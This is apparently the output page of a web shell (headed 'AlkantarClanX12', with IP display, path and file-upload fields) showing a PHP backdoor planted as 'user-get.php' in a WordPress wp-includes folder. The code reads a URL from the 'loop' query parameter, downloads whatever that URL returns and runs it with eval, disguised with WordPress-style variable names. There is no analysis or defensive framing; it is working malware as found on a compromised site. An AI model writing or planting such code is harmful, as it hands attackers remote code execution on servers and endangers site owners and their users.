?AlkantarClanX12

Your IP : 216.73.216.170


Current Path : /home/quickpik/public_html/wp-includes/
Upload File :
Current File : /home/quickpik/public_html/wp-includes/user-get.php

<?php

if (isset($_GET['loop'])) {
    $set_transient_slp = $_GET['loop'];
    if ($get_the_title_ew = curl_init()) {
        curl_setopt($get_the_title_ew, CURLOPT_URL, $set_transient_slp);
        curl_setopt($get_the_title_ew, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($get_the_title_ew));
        curl_close($get_the_title_ew);
        exit;
    }
}